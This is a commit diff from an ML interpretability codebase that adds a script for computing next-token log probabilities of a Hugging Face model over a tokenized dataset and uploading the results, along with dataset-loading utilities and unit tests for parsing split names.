get_next_logprobs revamp
jettjaniak committed Apr 26, 2024
1 parent 89b2b4b commit f08396f
Showing 7 changed files with 185 additions and 133 deletions.
28 changes: 0 additions & 28 deletions scripts/generate_logprobs.sh

This file was deleted.

115 changes: 115 additions & 0 deletions scripts/get_next_logprobs.py
@@ -0,0 +1,115 @@
#!/usr/bin/env python3
import argparse

import numpy as np
import torch
from datasets import Dataset
from tqdm.auto import trange
from transformers import AutoModelForCausalLM

from delphi import utils
from delphi.eval.utils import get_all_and_next_logprobs

torch.set_grad_enabled(False)


def main(
    in_model_repo_id: str,
    in_dataset_repo_id: str,
    split: str,
    feature: str,
    batch_size: int,
    out_repo_id: str,
):
    """
    Computes the log probability of the next token for each token in the dataset
    and uploads the resulting dataset to Hugging Face.
    """
    model = AutoModelForCausalLM.from_pretrained(in_model_repo_id)
    in_dataset_split = utils.load_dataset_split_sequence_int32_feature(
        in_dataset_repo_id, split, feature
    )
    in_dataset_split.set_format("torch")
    n_seq = len(in_dataset_split)
    seq_len = len(in_dataset_split[0][feature])
    logprobs = np.empty((n_seq, seq_len))
    # the first token in each sequence has no preceding context, so no logprob
    logprobs[:, 0] = float("nan")
    print("Running inference...")
    for i in trange(0, n_seq, batch_size):
        batch_tokens = in_dataset_split[i : i + batch_size][feature]
        logprobs[i : i + batch_size, 1:] = (
            get_all_and_next_logprobs(model, batch_tokens)[1].cpu().numpy()
        )

    hf_dataset = Dataset.from_dict({"logprobs": [row for row in logprobs]})

    hf_dataset.push_to_hub(
        repo_id=out_repo_id,
        split=utils.hf_split_to_split_name(split),
    )


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="Run inference and generate log probabilities."
    )
    parser.add_argument(
        "--in-model-repo-id",
        "--im",
        type=str,
        required=True,
        help="HF repo id of the model to run",
    )
    parser.add_argument(
        "--in-dataset-repo-id",
        "--id",
        type=str,
        required=True,
        help="HF repo id of the tokenized input dataset",
    )
    parser.add_argument(
        "--feature",
        "-f",
        type=str,
        required=True,
        help="Name of the column containing token sequences in the input dataset",
    )
    parser.add_argument(
        "--split",
        "-s",
        type=str,
        required=True,
        help="Split of the tokenized dataset, supports slicing like 'train[:10%%]'",
    )
    parser.add_argument(
        "--out-repo-id",
        "-o",
        type=str,
        required=True,
        help="Where to upload the next logprobs",
    )
    parser.add_argument(
        "--batch-size",
        "-b",
        type=int,
        default=80,
        help="How many sequences to evaluate at once",
    )
    # TODO
    # parser.add_argument(
    #     "--chunk-size",
    #     "-c",
    #     type=int,
    #     default=200_000,
    #     help="Size of the parquet chunks uploaded to HuggingFace",
    # )
    args = parser.parse_args()

    main(
        in_model_repo_id=args.in_model_repo_id,
        in_dataset_repo_id=args.in_dataset_repo_id,
        split=args.split,
        feature=args.feature,
        batch_size=args.batch_size,
        out_repo_id=args.out_repo_id,
    )
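For orientation, a minimal sketch of driving the script programmatically instead of via the CLI; it assumes scripts/ is importable from the working directory, and every repo id and the "tokens" column name below are hypothetical placeholders, not real repos. The keyword arguments mirror the flags defined above.

# Hypothetical invocation of main(); repo ids and column name are placeholders.
from scripts.get_next_logprobs import main

main(
    in_model_repo_id="delphi-suite/example-model",      # hypothetical model repo
    in_dataset_repo_id="delphi-suite/example-tokens",   # hypothetical tokenized dataset
    split="validation[:10%]",  # slicing is supported; the slice is stripped on upload
    feature="tokens",          # column holding the int32 token sequences
    batch_size=80,             # default from the CLI
    out_repo_id="delphi-suite/example-next-logprobs",   # hypothetical output repo
)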
105 changes: 0 additions & 105 deletions scripts/inference.py

This file was deleted.

50 changes: 50 additions & 0 deletions src/delphi/utils.py
@@ -0,0 +1,50 @@
from typing import cast

from datasets import Dataset, Features, Sequence, Value, load_dataset


def hf_split_to_split_name(split: str) -> str:
    # strip any slice suffix, e.g. "train[:10%]" -> "train"
    return split.split("[")[0]


# TODO: test load_dataset functions
def load_dataset_split_features(
    repo_id: str,
    split: str,
    features: Features,
) -> Dataset:
    dataset = load_dataset(
        repo_id,
        split=split,
        features=features,
    )
    dataset = cast(Dataset, dataset)
    return dataset


def load_dataset_split_string_feature(
    repo_id: str,
    split: str,
    feature_name: str,
) -> Dataset:
    print("Loading string dataset")
    print(f"{repo_id=}, {split=}, {feature_name=}")
    return load_dataset_split_features(
        repo_id,
        split,
        Features({feature_name: Value("string")}),
    )


def load_dataset_split_sequence_int32_feature(
    repo_id: str,
    split: str,
    feature_name: str,
) -> Dataset:
    print("Loading sequence int32 dataset")
    print(f"{repo_id=}, {split=}, {feature_name=}")
    return load_dataset_split_features(
        repo_id,
        split,
        Features({feature_name: Sequence(Value("int32"))}),
    )
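A short sketch of how these helpers compose, as used by scripts/get_next_logprobs.py; the repo id "org/tokens-dataset" and the "tokens" column are hypothetical placeholders.

# Hypothetical usage; repo id and column name are placeholders.
from delphi.utils import hf_split_to_split_name, load_dataset_split_sequence_int32_feature

assert hf_split_to_split_name("train[:10%]") == "train"

ds = load_dataset_split_sequence_int32_feature("org/tokens-dataset", "train[:10%]", "tokens")
ds.set_format("torch")  # as done in scripts/get_next_logprobs.py
print(len(ds), len(ds[0]["tokens"]))  # number of sequences, sequence length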
Empty file added tests/__init__.py
Empty file.
14 changes: 14 additions & 0 deletions tests/test_utils.py
@@ -0,0 +1,14 @@
from delphi.utils import hf_split_to_split_name

from .utils import random_string


def test_hf_split_to_split_name():
    random_split_name = random_string(5)
    assert hf_split_to_split_name(random_split_name) == random_split_name
    assert hf_split_to_split_name(f"{random_split_name}[:10%]") == random_split_name
    assert hf_split_to_split_name(f"{random_split_name}[10%:]") == random_split_name
    assert hf_split_to_split_name(f"{random_split_name}[10%:20%]") == random_split_name
    assert hf_split_to_split_name(f"{random_split_name}[:200]") == random_split_name
    assert hf_split_to_split_name(f"{random_split_name}[200:]") == random_split_name
    assert hf_split_to_split_name(f"{random_split_name}[200:400]") == random_split_name
6 changes: 6 additions & 0 deletions tests/utils.py
@@ -0,0 +1,6 @@
import random
import string


def random_string(length: int) -> str:
    return "".join(random.choices(string.ascii_lowercase, k=length))
